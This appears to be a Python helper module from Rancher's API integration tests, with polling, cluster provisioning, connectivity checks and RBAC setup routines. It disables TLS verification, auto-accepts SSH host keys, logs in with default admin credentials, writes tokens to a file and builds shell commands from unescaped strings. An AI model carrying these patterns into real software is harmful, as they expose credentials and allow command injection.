if node.requestedHostname not in exception_list:
node = wait_for_node_status(client, node, "active")
if node is None:
print("Need to re-evalauate new node list")
node_auto_deleted = True
retry_count += 1
print("Retry Count:" + str(retry_count))
if node_auto_deleted and retry_count < 5:
wait_for_nodes_to_become_active(client, cluster, exception_list,
retry_count)
def wait_for_node_status(client, node, state):
uuid = node.uuid
start = time.time()
nodes = client.list_node(uuid=uuid).data
node_count = len(nodes)
# Handle the case of nodes getting auto deleted when they are part of
# nodepools
if node_count == 1:
node_status = nodes[0].state
else:
print("Node does not exist anymore -" + uuid)
return None
while node_status != state:
if time.time() - start > MACHINE_TIMEOUT:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(5)
nodes = client.list_node(uuid=uuid).data
node_count = len(nodes)
if node_count == 1:
node_status = nodes[0].state
else:
print("Node does not exist anymore -" + uuid)
return None
return node
def wait_for_node_to_be_deleted(client, node, timeout=300):
uuid = node.uuid
start = time.time()
nodes = client.list_node(uuid=uuid).data
node_count = len(nodes)
while node_count != 0:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
nodes = client.list_node(uuid=uuid).data
node_count = len(nodes)
def wait_for_cluster_node_count(client, cluster, expected_node_count,
timeout=300):
start = time.time()
nodes = client.list_node(clusterId=cluster.id).data
node_count = len(nodes)
while node_count != expected_node_count:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
nodes = client.list_node(clusterId=cluster.id).data
node_count = len(nodes)
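# Build the node registration command from the cluster registration token,
# appending the requested role flags and the node's public/internal addresses;
# Windows nodes (ssh user 'Administrator') get the windowsNodeCommand instead.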
def get_custom_host_registration_cmd(client, cluster, roles, node):
allowed_roles = ["etcd", "worker", "controlplane"]
cluster_tokens = client.list_cluster_registration_token(
clusterId=cluster.id).data
if len(cluster_tokens) > 0:
cluster_token = cluster_tokens[0]
else:
cluster_token = create_custom_host_registration_token(client, cluster)
additional_options = " --address " + node.public_ip_address + \
" --internal-address " + node.private_ip_address
if 'Administrator' == node.ssh_user:
cmd = cluster_token.windowsNodeCommand
cmd = cmd.replace('| iex', '--worker' + additional_options + ' | iex ')
else:
cmd = cluster_token.nodeCommand
for role in roles:
assert role in allowed_roles
cmd += " --" + role
cmd += additional_options
return cmd
def create_custom_host_registration_token(client, cluster):
# Allow sometime for the "cluster_owner" CRTB to take effect
time.sleep(5)
cluster_token = client.create_cluster_registration_token(
clusterId=cluster.id)
cluster_token = client.wait_success(cluster_token)
assert cluster_token.state == 'active'
return cluster_token
def get_cluster_by_name(client, name):
clusters = client.list_cluster(name=name).data
assert len(clusters) == 1, "Cluster " + name + " does not exist"
return clusters[0]
def get_cluster_type(client, cluster):
cluster_configs = [
"amazonElasticContainerServiceConfig",
"azureKubernetesServiceConfig",
"googleKubernetesEngineConfig",
"rancherKubernetesEngineConfig"
]
if "rancherKubernetesEngineConfig" in cluster:
nodes = client.list_node(clusterId=cluster.id).data
if len(nodes) > 0:
if nodes[0].nodeTemplateId is None:
return "Custom"
for cluster_config in cluster_configs:
if cluster_config in cluster:
return cluster_config
return "Imported"
def delete_cluster(client, cluster):
nodes = client.list_node(clusterId=cluster.id).data
# Delete nodes(in cluster) from AWS for Imported and Custom Cluster
if len(nodes) > 0:
cluster_type = get_cluster_type(client, cluster)
print(cluster_type)
if get_cluster_type(client, cluster) in ["Imported", "Custom"]:
filters = [
{'Name': 'tag:Name',
'Values': ['testcustom*', 'teststress*', 'testsa*']}]
ip_filter = {}
ip_list = []
ip_filter['Name'] = \
'network-interface.addresses.association.public-ip'
ip_filter['Values'] = ip_list
filters.append(ip_filter)
for node in nodes:
host_ip = resolve_node_ip(node)
ip_list.append(host_ip)
assert len(ip_filter) > 0
print(ip_filter)
aws_nodes = AmazonWebServices().get_nodes(filters)
if aws_nodes is None:
# search instances by IPs in case names do not follow patterns
aws_nodes = AmazonWebServices().get_nodes(filters=[ip_filter])
if aws_nodes is None:
print("no instance is found in AWS")
else:
for node in aws_nodes:
print(node.public_ip_address)
AmazonWebServices().delete_nodes(aws_nodes)
# Delete Cluster
client.delete(cluster)
def check_connectivity_between_workloads(p_client1, workload1, p_client2,
workload2, allow_connectivity=True):
wl1_pods = p_client1.list_pod(workloadId=workload1.id).data
wl2_pods = p_client2.list_pod(workloadId=workload2.id).data
for pod in wl1_pods:
for o_pod in wl2_pods:
check_connectivity_between_pods(pod, o_pod, allow_connectivity)
def check_connectivity_between_workload_pods(p_client, workload):
pods = p_client.list_pod(workloadId=workload.id).data
for pod in pods:
for o_pod in pods:
check_connectivity_between_pods(pod, o_pod)
def check_connectivity_between_pods(pod1, pod2, allow_connectivity=True):
pod_ip = pod2.status.podIp
cmd = "ping -c 1 -W 1 " + pod_ip
if is_windows():
cmd = 'ping -w 1 -n 1 {0}'.format(pod_ip)
response = kubectl_pod_exec(pod1, cmd)
assert pod_ip in str(response)
if allow_connectivity:
if is_windows():
assert " (0% loss)" in str(response)
else:
assert " 0% packet loss" in str(response)
else:
if is_windows():
assert " (100% loss)" in str(response)
else:
assert " 100% packet loss" in str(response)
def kubectl_pod_exec(pod, cmd):
command = "exec " + pod.name + " -n " + pod.namespaceId + " -- " + cmd
return execute_kubectl_cmd(command, json_out=False, stderr=True)
def exec_shell_command(ip, port, cmd, password, user="root", sshKey=None):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
if sshKey:
ssh.connect(ip, username=user, key_filename=sshKey, port=port)
else:
ssh.connect(ip, username=user, password=password, port=port)
stdin, stdout, stderr = ssh.exec_command(cmd)
response = stdout.readlines()
return response
def wait_for_ns_to_become_active(client, ns, timeout=DEFAULT_TIMEOUT):
start = time.time()
time.sleep(10)
nss = client.list_namespace(uuid=ns.uuid).data
assert len(nss) == 1
ns = nss[0]
while ns.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
nss = client.list_namespace(uuid=ns.uuid).data
assert len(nss) == 1
ns = nss[0]
return ns
def wait_for_pod_images(p_client, workload, ns_name, expectedimage, numofpods,
timeout=DEFAULT_TIMEOUT):
start = time.time()
for key, value in workload.workloadLabels.items():
label = key + "=" + value
get_pods = "get pods -l" + label + " -n " + ns_name
pods = execute_kubectl_cmd(get_pods)
for x in range(0, numofpods - 1):
pod = pods["items"][x]
podimage = pod["spec"]["containers"][0]["image"]
while podimage != expectedimage:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for correct pod images")
time.sleep(.5)
pods = execute_kubectl_cmd(get_pods)
pod = pods["items"][x]
podimage = pod["spec"]["containers"][0]["image"]
def wait_for_pods_in_workload(p_client, workload, pod_count,
timeout=DEFAULT_TIMEOUT):
start = time.time()
pods = p_client.list_pod(workloadId=workload.id).data
while len(pods) != pod_count:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for pods in workload {}. Expected {}. "
"Got {}".format(workload.name, pod_count, len(pods)))
time.sleep(.5)
pods = p_client.list_pod(workloadId=workload.id).data
return pods
def get_user_client_and_cluster(client=None):
if not client:
client = get_user_client()
if CLUSTER_NAME == "":
clusters = client.list_cluster().data
else:
clusters = client.list_cluster(name=CLUSTER_NAME).data
assert len(clusters) > 0
cluster = clusters[0]
return client, cluster
def get_global_admin_client_and_cluster():
client = get_admin_client()
if CLUSTER_NAME == "":
clusters = client.list_cluster().data
else:
clusters = client.list_cluster(name=CLUSTER_NAME).data
assert len(clusters) > 0
cluster = clusters[0]
return client, cluster
def validate_cluster_state(client, cluster,
check_intermediate_state=True,
intermediate_state="provisioning",
nodes_not_in_active_state=[],
timeout=MACHINE_TIMEOUT):
start_time = time.time()
if check_intermediate_state:
cluster = wait_for_condition(
client, cluster,
lambda x: x.state == intermediate_state,
lambda x: 'State is: ' + x.state,
timeout=timeout)
assert cluster.state == intermediate_state
cluster = wait_for_condition(
client, cluster,
lambda x: x.state == "active",
lambda x: 'State is: ' + x.state,
timeout=timeout)
assert cluster.state == "active"
wait_for_nodes_to_become_active(client, cluster,
exception_list=nodes_not_in_active_state)
timeout = 60
start = time.time()
while "version" not in cluster.keys():
time.sleep(1)
cluster = client.reload(cluster)
delta = time.time() - start
if delta > timeout:
msg = "Timeout waiting for K8s version to be synced"
raise Exception(msg)
end_time = time.time()
diff = time.strftime("%H:%M:%S", time.gmtime(end_time - start_time))
print("The total time for provisioning/updating the cluster {} : {}".
format(cluster.name, diff))
return cluster
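# Poll client.reload() with exponential backoff (capped at 2s); a 403 ApiError
# means the object is not visible yet, anything else is re-raised.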
def wait_until_available(client, obj, timeout=DEFAULT_TIMEOUT):
start = time.time()
sleep = 0.01
while True:
time.sleep(sleep)
sleep *= 2
if sleep > 2:
sleep = 2
try:
obj = client.reload(obj)
except ApiError as e:
if e.error.status != 403:
raise e
else:
return obj
delta = time.time() - start
if delta > timeout:
msg = 'Timeout waiting for [{}:{}] for condition after {}' \
' seconds'.format(obj.type, obj.id, delta)
raise Exception(msg)
def delete_node(aws_nodes):
for node in aws_nodes:
AmazonWebServices().delete_node(node)
def cluster_cleanup(client, cluster, aws_nodes=None):
if RANCHER_CLEANUP_CLUSTER:
client.delete(cluster)
if aws_nodes is not None:
delete_node(aws_nodes)
else:
env_details = "env.CATTLE_TEST_URL='" + CATTLE_TEST_URL + "'\n"
env_details += "env.ADMIN_TOKEN='" + ADMIN_TOKEN + "'\n"
env_details += "env.USER_TOKEN='" + USER_TOKEN + "'\n"
env_details += "env.CLUSTER_NAME='" + cluster.name + "'\n"
create_config_file(env_details)
def create_config_file(env_details):
file = open(env_file, "w")
file.write(env_details)
file.close()
def validate_hostPort(p_client, workload, source_port, cluster):
get_endpoint_url_for_workload(p_client, workload)
wl = p_client.list_workload(uuid=workload.uuid).data[0]
source_port_wk = wl.publicEndpoints[0]["port"]
assert source_port == source_port_wk, "Source ports do not match"
pods = p_client.list_pod(workloadId=workload.id).data
nodes = get_schedulable_nodes(cluster)
for node in nodes:
target_name_list = []
for pod in pods:
print(pod.nodeId + " check " + node.id)
if pod.nodeId == node.id:
target_name_list.append(pod.name)
break
if len(target_name_list) > 0:
host_ip = resolve_node_ip(node)
curl_cmd = " http://" + host_ip + ":" + \
str(source_port) + "/name.html"
validate_http_response(curl_cmd, target_name_list)
def validate_lb(p_client, workload, source_port):
url = get_endpoint_url_for_workload(p_client, workload)
wl = p_client.list_workload(uuid=workload.uuid).data[0]
source_port_wk = wl.publicEndpoints[0]["port"]
assert source_port == source_port_wk, "Source ports do not match"
target_name_list = get_target_names(p_client, [workload])
wait_until_lb_is_active(url)
validate_http_response(url + "/name.html", target_name_list)
def validate_nodePort(p_client, workload, cluster, source_port):
get_endpoint_url_for_workload(p_client, workload, 600)
wl = p_client.list_workload(uuid=workload.uuid).data[0]
source_port_wk = wl.publicEndpoints[0]["port"]
assert source_port == source_port_wk, "Source ports do not match"
nodes = get_schedulable_nodes(cluster)
pods = p_client.list_pod(workloadId=wl.id).data
target_name_list = []
for pod in pods:
target_name_list.append(pod.name)
print("target name list:" + str(target_name_list))
for node in nodes:
host_ip = resolve_node_ip(node)
curl_cmd = " http://" + host_ip + ":" + \
str(source_port_wk) + "/name.html"
validate_http_response(curl_cmd, target_name_list)
def validate_clusterIp(p_client, workload, cluster_ip, test_pods, source_port):
pods = p_client.list_pod(workloadId=workload.id).data
target_name_list = []
for pod in pods:
target_name_list.append(pod["name"])
curl_cmd = "http://" + cluster_ip + ":" + \
str(source_port) + "/name.html"
for pod in test_pods:
validate_http_response(curl_cmd, target_name_list, pod)
def wait_for_pv_to_be_available(c_client, pv_object, timeout=DEFAULT_TIMEOUT):
start = time.time()
time.sleep(2)
list = c_client.list_persistent_volume(uuid=pv_object.uuid).data
assert len(list) == 1
pv = list[0]
while pv.state != "available":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to available")
time.sleep(.5)
list = c_client.list_persistent_volume(uuid=pv_object.uuid).data
assert len(list) == 1
pv = list[0]
return pv
def wait_for_pvc_to_be_bound(p_client, pvc_object, timeout=DEFAULT_TIMEOUT):
start = time.time()
time.sleep(2)
list = p_client.list_persistent_volume_claim(uuid=pvc_object.uuid).data
assert len(list) == 1
pvc = list[0]
while pvc.state != "bound":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to bound")
time.sleep(.5)
list = p_client.list_persistent_volume_claim(uuid=pvc_object.uuid).data
assert len(list) == 1
pvc = list[0]
return pvc
def create_wl_with_nfs(p_client, ns_id, pvc_name, wl_name,
mount_path, sub_path, is_daemonSet=False):
volumes = [{"type": "volume",
"name": "vol1",
"persistentVolumeClaim": {
"readOnly": "false",
"type": "persistentVolumeClaimVolumeSource",
"persistentVolumeClaimId": pvc_name
}}]
volumeMounts = [{"readOnly": "False",
"type": "volumeMount",
"mountPath": mount_path,
"subPath": sub_path,
"name": "vol1"
}]
con = [{"name": "test1",
"image": TEST_IMAGE,
"volumeMounts": volumeMounts
}]
if is_daemonSet:
workload = p_client.create_workload(name=wl_name,
containers=con,
namespaceId=ns_id,
volumes=volumes,
daemonSetConfig={})
else:
workload = p_client.create_workload(name=wl_name,
containers=con,
namespaceId=ns_id,
volumes=volumes)
return workload
def write_content_to_file(pod, content, filename):
cmd_write = "/bin/bash -c 'echo {1} > {0}'".format(filename, content)
if is_windows():
        cmd_write = \
            'powershell -NoLogo -NonInteractive -Command ' \
            '"& {{ echo {1} > {0} }}"'.format(filename, content)
output = kubectl_pod_exec(pod, cmd_write)
assert output.strip().decode('utf-8') == ""
def validate_file_content(pod, content, filename):
cmd_get_content = "/bin/bash -c 'cat {0}' ".format(filename)
if is_windows():
        cmd_get_content = 'powershell -NoLogo -NonInteractive -Command ' \
                          '"& {{ cat {0} }}"'.format(filename)
output = kubectl_pod_exec(pod, cmd_get_content)
assert output.strip().decode('utf-8') == content
def wait_for_mcapp_to_active(client, multiClusterApp,
timeout=DEFAULT_MULTI_CLUSTER_APP_TIMEOUT):
time.sleep(5)
# When the app is deployed it goes into Active state for a short
# period of time and then into installing/deploying.
mcapps = client.list_multiClusterApp(uuid=multiClusterApp.uuid,
name=multiClusterApp.name).data
start = time.time()
assert len(mcapps) == 1, "Cannot find multi cluster app"
mapp = mcapps[0]
while mapp.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
multiclusterapps = client.list_multiClusterApp(
uuid=multiClusterApp.uuid, name=multiClusterApp.name).data
assert len(multiclusterapps) == 1
mapp = multiclusterapps[0]
return mapp
def wait_for_app_to_active(client, app_id,
timeout=DEFAULT_MULTI_CLUSTER_APP_TIMEOUT):
"""
First wait for app to come in deployment state, then wait for it get
in active state. This is to avoid wrongly conclude that app is active
as app goes to state installing > active > deploying > active
@param client: Project client
@param app_id: App id of deployed app.
@param timeout: Max time allowed to wait for app to become active.
@return: app object
"""
start = time.time()
app_data = client.list_app(id=app_id).data
while len(app_data) == 0:
if time.time() - start > timeout / 10:
raise AssertionError(
"Timed out waiting for listing the app from API")
time.sleep(.2)
app_data = client.list_app(id=app_id).data
application = app_data[0]
while application.state != "deploying":
if time.time() - start > timeout / 3:
break
time.sleep(.2)
app_data = client.list_app(id=app_id).data
application = app_data[0]
while application.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
app = client.list_app(id=app_id).data
assert len(app) >= 1
application = app[0]
return application
def wait_for_app_to_remove(client, app_id,
timeout=DEFAULT_MULTI_CLUSTER_APP_TIMEOUT):
start = time.time()
app_data = client.list_app(id=app_id).data
if len(app_data) == 0:
return
application = app_data[0]
while application.state == "removing" or application.state == "active":
if time.time() - start > timeout / 10:
raise AssertionError(
"Timed out waiting for app to not be installed")
time.sleep(.2)
app_data = client.list_app(id=app_id).data
if len(app_data) == 0:
break
application = app_data[0]
def validate_response_app_endpoint(p_client, appId,
timeout=DEFAULT_MULTI_CLUSTER_APP_TIMEOUT):
ingress_list = p_client.list_ingress(namespaceId=appId).data
assert len(ingress_list) == 1
ingress = ingress_list[0]
if hasattr(ingress, 'publicEndpoints'):
for public_endpoint in ingress.publicEndpoints:
url = \
public_endpoint["protocol"].lower() + "://" + \
public_endpoint["hostname"]
print(url)
start = time.time()
try:
while True:
r = requests.head(url)
print(r.status_code)
if r.status_code == 200:
return
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting response to be 200.")
time.sleep(.5)
except requests.ConnectionError:
print("failed to connect")
assert False, "failed to connect to the app"
def resolve_node_ip(node):
if hasattr(node, 'externalIpAddress'):
node_ip = node.externalIpAddress
else:
node_ip = node.ipAddress
return node_ip
def provision_nfs_server():
node = AmazonWebServices().create_node(random_test_name("nfs-server"))
node.wait_for_ssh_ready()
c_path = os.getcwd()
cmd_path = c_path + "/tests/v3_api/scripts/nfs-setup.sh"
command = open(cmd_path, 'r').read()
node.execute_command(command)
return node
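# Walk the catalog template's questions and build an answers dict: honor
# showIf/showSubquestionIf conditions, take declared defaults, and fall back to
# placeholder values for required questions without defaults.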
def get_defaut_question_answers(client, externalId):
def get_answer(quest):
if "default" in quest.keys():
answer = quest["default"]
else:
answer = ""
# If required and no default value is available, set fake value
# only for type string . For other types error out
if "required" in quest.keys():
if quest["required"]:
if quest["type"] == "enum" and "options" in quest.keys():
answer = quest["options"][0]
elif quest["type"] == "password":
answer = "R@ncher135"
elif quest["type"] == "string":
answer = "fake"
else:
assert False, \
"Cannot set default for types {}" \
"".format(quest["type"])
return answer
def check_if_question_needed(questions_and_answers, ques):
add_question = False
match_string = ques["showIf"]
match_q_as = match_string.split("&&")
for q_a in match_q_as:
items = q_a.split("=")
if len(items) == 1:
items.append("")
if items[0] in questions_and_answers.keys():
if questions_and_answers[items[0]] == items[1]:
add_question = True
else:
add_question = False
break
return add_question
questions_and_answers = {}
print("external id = {}".format(externalId))
template_revs = client.list_template_version(externalId=externalId).data
assert len(template_revs) == 1
template_rev = template_revs[0]
questions = template_rev.questions
for ques in questions:
add_question = True
if "showIf" in ques.keys():
add_question = \
check_if_question_needed(questions_and_answers, ques)
if add_question:
question = ques["variable"]
answer = get_answer(ques)
            questions_and_answers[question] = answer
if "showSubquestionIf" in ques.keys():
if ques["showSubquestionIf"] == answer:
sub_questions = ques["subquestions"]
for sub_question in sub_questions:
question = sub_question["variable"]
questions_and_answers[question] = \
get_answer(sub_question)
print("questions_and_answers = {}".format(questions_and_answers))
return questions_and_answers
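# Illustrative sketch (not part of the test suite): for a template-version
# question like {"variable": "mysqlUser", "type": "string", "required": True}
# with no "default", get_answer() above falls back to "fake"; an enum question
# with "options" gets its first option, and a password question gets
# "R@ncher135". The question shown here is a made-up example of the
# "questions" payload returned by list_template_version().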
def validate_app_deletion(client, app_id,
timeout=DEFAULT_APP_DELETION_TIMEOUT):
app_data = client.list_app(id=app_id).data
start = time.time()
if len(app_data) == 0:
return
application = app_data[0]
while application.state == "removing":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for app to delete")
time.sleep(.5)
app_data = client.list_app(id=app_id).data
if len(app_data) == 0:
break
application = app_data[0]
def validate_catalog_app(proj_client, app, external_id, answer=None):
"""
    This method validates that all deployed workloads are in the active state
    and have the correct chart version, and validates the answers.
    @param proj_client: Project client object of an existing project.
    @param app: Deployed app object.
    @param external_id: URL of the app in the catalog API.
    @param answer: answers the app asks for while deploying (body of the post call).
@return: Deployed app object.
"""
if answer is None:
answers = get_defaut_question_answers(get_user_client(), external_id)
else:
answers = answer
# validate app is active
app = wait_for_app_to_active(proj_client, app.id)
assert app.externalId == external_id, \
"the version of the app is not correct"
# check if associated workloads are active
ns = app.targetNamespace
parameters = external_id.split('&')
assert len(parameters) > 1, \
"Incorrect list of parameters from catalog external ID"
chart_prefix = parameters[len(parameters) - 2].split("=")[1]
chart_suffix = parameters[len(parameters) - 1].split("=")[1]
chart = chart_prefix + "-" + chart_suffix
app_name = parameters[len(parameters) - 2].split("=")[1]
workloads = proj_client.list_workload(namespaceId=ns).data
# For longhorn app, only active state of workloads is verified as longhorn
# workloads do not have the field workloadLabels
# For all other apps active state of workloads & chart version are verified
if "longhorn" in app.externalId:
print("validating the Longhorn app, it may take longer than others")
for wl in workloads:
wait_for_wl_to_active(proj_client, wl)
else:
for wl in workloads:
print("Workload {} , state - {}".format(wl.id, wl.state))
assert wl.state == "active"
chart_deployed = get_chart_info(wl.workloadLabels)
print("Chart detail of app - {}".format(chart_deployed))
# '-' check is to make sure chart has both app name and version.
if app_name in chart_deployed and '-' in chart_deployed:
assert chart_deployed == chart, "the chart version is wrong"
    # Validate app answers
assert len(answers.items() - app["answers"].items()) == 0, \
"Answers are not same as the original catalog answers"
return app
def get_chart_info(workloadlabels):
"""
    This method looks up either the 'chart' label or the
    'helm.sh/chart' label from the workload API.
    @param workloadlabels: workloadLabels object
    @return: chart value of the workload, e.g. 'app_name-version'
"""
if "chart" in workloadlabels.keys():
return workloadlabels.chart
elif "helm.sh/chart" in workloadlabels.keys():
return workloadlabels["helm.sh/chart"]
else:
return ''
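# Hedged usage example: with a plain dict standing in for the workloadLabels
# object (the real object also supports attribute access such as .chart):
#   get_chart_info({"helm.sh/chart": "mysql-1.6.2"})  # -> "mysql-1.6.2"
#   get_chart_info({})                                # -> ''
# The chart name and version are invented for illustration.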
def create_user(client, cattle_auth_url=CATTLE_AUTH_URL):
user_name = random_name()
user = client.create_user(username=user_name,
password=USER_PASSWORD)
client.create_global_role_binding(globalRoleId="user",
subjectKind="User",
userId=user.id)
user_token = get_user_token(user.username, USER_PASSWORD, cattle_auth_url)
return user, user_token
def get_user_token(username, password, cattle_auth_url=CATTLE_AUTH_URL):
r = requests.post(cattle_auth_url, json={
'username': username,
'password': password,
'responseType': 'json',
}, verify=False)
print(r.json())
return r.json()["token"]
def rbac_get_user_by_role(role):
if role in rbac_data["users"].keys():
return rbac_data["users"][role]["user"]
return None
def rbac_get_user_token_by_role(role):
if role in rbac_data["users"].keys():
return rbac_data["users"][role]["token"]
return None
def rbac_get_kubeconfig_by_role(role):
if role in rbac_data["users"].keys():
return rbac_data["users"][role]["kubeconfig"]
return None
def rbac_get_project():
return rbac_data["project"]
def rbac_get_namespace():
return rbac_data["namespace"]
def rbac_get_workload():
return rbac_data["workload"]
def rbac_get_unshared_project():
return rbac_data["p_unshared"]
def rbac_get_unshared_ns():
return rbac_data["ns_unshared"]
def rbac_get_unshared_workload():
return rbac_data["wl_unshared"]
def rbac_prepare():
"""this function creates one project, one namespace,
and four users with different roles"""
admin_client, cluster = get_global_admin_client_and_cluster()
create_kubeconfig(cluster)
# create a new project in the cluster
project, ns = create_project_and_ns(ADMIN_TOKEN,
cluster,
random_test_name("p-test-rbac"))
con = [{"name": "test1",
"image": TEST_IMAGE}]
name = random_test_name("default")
p_client = get_project_client_for_token(project, ADMIN_TOKEN)
workload = p_client.create_workload(name=name,
containers=con,
namespaceId=ns.id)
validate_workload(p_client, workload, "deployment", ns.name)
rbac_data["workload"] = workload
rbac_data["project"] = project
rbac_data["namespace"] = ns
# create new users
for key in rbac_data["users"]:
user1, token1 = create_user(admin_client)
rbac_data["users"][key]["user"] = user1
rbac_data["users"][key]["token"] = token1
# assign different role to each user
assign_members_to_cluster(admin_client,
rbac_data["users"][CLUSTER_OWNER]["user"],
cluster,
CLUSTER_OWNER)
assign_members_to_cluster(admin_client,
rbac_data["users"][CLUSTER_MEMBER]["user"],
cluster,
CLUSTER_MEMBER)
assign_members_to_project(admin_client,
rbac_data["users"][PROJECT_MEMBER]["user"],
project,
PROJECT_MEMBER)
assign_members_to_project(admin_client,
rbac_data["users"][PROJECT_OWNER]["user"],
project,
PROJECT_OWNER)
assign_members_to_project(admin_client,
rbac_data["users"][PROJECT_READ_ONLY]["user"],
project,
PROJECT_READ_ONLY)
# create kubeconfig files for each user
for key in rbac_data["users"]:
user_client = get_client_for_token(rbac_data["users"][key]["token"])
_, user_cluster = get_user_client_and_cluster(user_client)
rbac_data["users"][key]["kubeconfig"] = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
key + "_kubeconfig")
create_kubeconfig(user_cluster, rbac_data["users"][key]["kubeconfig"])
# create another project that none of the above users are assigned to
p2, ns2 = create_project_and_ns(ADMIN_TOKEN,
cluster,
random_test_name("p-unshared"))
name = random_test_name("default")
p_client = get_project_client_for_token(p2, ADMIN_TOKEN)
workload = p_client.create_workload(name=name,
containers=con,
namespaceId=ns2.id)
validate_workload(p_client, workload, "deployment", ns2.name)
rbac_data["p_unshared"] = p2
rbac_data["ns_unshared"] = ns2
rbac_data["wl_unshared"] = workload
def rbac_cleanup():
""" remove the project, namespace and users created for the RBAC tests"""
try:
client = get_admin_client()
except Exception:
print("Not able to get admin client. Not performing RBAC cleanup")
return
for _, value in rbac_data["users"].items():
try:
client.delete(value["user"])
except Exception:
pass
client.delete(rbac_data["project"])
client.delete(rbac_data["wl_unshared"])
client.delete(rbac_data["p_unshared"])
def check_condition(condition_type, status):
def _find_condition(resource):
if not hasattr(resource, "conditions"):
return False
if resource.conditions is None:
return False
for condition in resource.conditions:
if condition.type == condition_type and condition.status == status:
return True
return False
return _find_condition
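# Hedged usage sketch: check_condition() returns a predicate that can be
# applied to any resource exposing a "conditions" list, e.g.
#   is_ready = check_condition("Ready", "True")
#   if is_ready(cluster):
#       ...  # cluster reports a condition with type "Ready" and status "True"
# "cluster" is a placeholder for any such resource object.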
def create_catalog_external_id(catalog_name, template, version,
project_cluster_id=None, catalog_type=None):
if catalog_type is None:
return "catalog://?catalog=" + catalog_name + \
"&template=" + template + "&version=" + version
elif catalog_type == "project" or catalog_type == "cluster":
return "catalog://?catalog=" + project_cluster_id + "/" \
+ catalog_name + "&type=" + catalog_type \
+ "Catalog&template=" + template + "&version=" + version
def wait_for_catalog_active(client, catalog, timeout=DEFAULT_CATALOG_TIMEOUT):
time.sleep(2)
catalog_data = client.list_catalog(name=catalog.name)
print(catalog_data)
start = time.time()
assert len(catalog_data["data"]) >= 1, "Cannot find catalog"
catalog = catalog_data["data"][0]
while catalog.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
catalog_data = client.list_catalog(name=catalog.name)
assert len(catalog_data["data"]) >= 1
catalog = catalog_data["data"][0]
return catalog
def readDataFile(data_dir, name):
fname = os.path.join(data_dir, name)
print("File: " + fname)
is_file = os.path.isfile(fname)
assert is_file
with open(fname) as f:
return f.read()
def set_url_password_token(rancher_url, server_url=None):
"""Returns a ManagementContext for the default global admin user."""
auth_url = \
rancher_url + "/v3-public/localproviders/local?action=login"
r = requests.post(auth_url, json={
'username': 'admin',
'password': 'admin',
'responseType': 'json',
}, verify=False)
print(r.json())
token = r.json()['token']
print(token)
# Change admin password
client = rancher.Client(url=rancher_url + "/v3",
token=token, verify=False)
admin_user = client.list_user(username="admin").data
admin_user[0].setpassword(newPassword=ADMIN_PASSWORD)
# Set server-url settings
serverurl = client.list_setting(name="server-url").data
if server_url:
client.update(serverurl[0], value=server_url)
else:
client.update(serverurl[0], value=rancher_url)
return token
def validate_create_catalog(token, catalog_name, branch, url, permission=True):
"""
This function validates if the user has the permission to create a
global catalog.
:param token: user's token
:param catalog_name: the name of the catalog
:param branch: the branch of the git repo
:param url: the url of the git repo
:param permission: boolean value, True if the user can create catalog
:return: the catalog object or None
"""
client = get_client_for_token(token)
if not permission:
with pytest.raises(ApiError) as e:
client.create_catalog(name=catalog_name,
branch=branch,
url=url)
error_msg = "user with no permission should receive 403: Forbidden"
error_code = e.value.error.code
error_status = e.value.error.status
assert error_status == 403 and error_code == 'Forbidden', error_msg
return None
else:
try:
client.create_catalog(name=catalog_name,
branch=branch,
url=url)
except ApiError as e:
assert False, "user with permission should receive no exception:" \
+ str(e.error.status) + " " + e.error.code
catalog_list = client.list_catalog(name=catalog_name).data
assert len(catalog_list) == 1
return catalog_list[0]
def generate_template_global_role(name, new_user_default=False, template=None):
""" generate a template that is used for creating a global role"""
if template is None:
template = TEMPLATE_MANAGE_CATALOG
template = deepcopy(template)
if new_user_default:
template["newUserDefault"] = "true"
else:
template["newUserDefault"] = "false"
if name is None:
name = random_name()
template["name"] = name
return template
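# Hedged usage example (TEMPLATE_MANAGE_CATALOG is assumed to be a dict of
# global-role rules defined elsewhere in this module):
#   body = generate_template_global_role("catalog-admins", new_user_default=True)
#   # body["name"] == "catalog-admins", body["newUserDefault"] == "true";
#   # the returned dict is intended as the request body for creating a global role.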
def wait_for_backup_to_active(cluster, backupname,
timeout=DEFAULT_TIMEOUT):
start = time.time()
etcdbackups = cluster.etcdBackups(name=backupname)
assert len(etcdbackups) == 1
etcdbackupdata = etcdbackups['data']
etcdbackupstate = etcdbackupdata[0]['state']
while etcdbackupstate != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
etcdbackups = cluster.etcdBackups(name=backupname)
assert len(etcdbackups) == 1
etcdbackupdata = etcdbackups['data']
etcdbackupstate = etcdbackupdata[0]['state']
print("BACKUP STATE")
print(etcdbackupstate)
return etcdbackupstate
def wait_for_backup_to_delete(cluster, backupname,
timeout=DEFAULT_TIMEOUT):
start = time.time()
etcdbackups = cluster.etcdBackups(name=backupname)
while len(etcdbackups) == 1:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for backup to be deleted")
time.sleep(.5)
etcdbackups = cluster.etcdBackups(name=backupname)
def validate_backup_create(namespace, backup_info, backup_mode=None):
p_client = namespace["p_client"]
ns = namespace["ns"]
cluster = namespace["cluster"]
name = random_test_name("default")
if not hasattr(cluster, 'rancherKubernetesEngineConfig'):
assert False, "Cluster is not of type RKE"
con = [{"name": "test1",
"image": TEST_IMAGE}]
backup_info["workload"] = p_client.create_workload(name=name,
containers=con,
namespaceId=ns.id,
daemonSetConfig={})
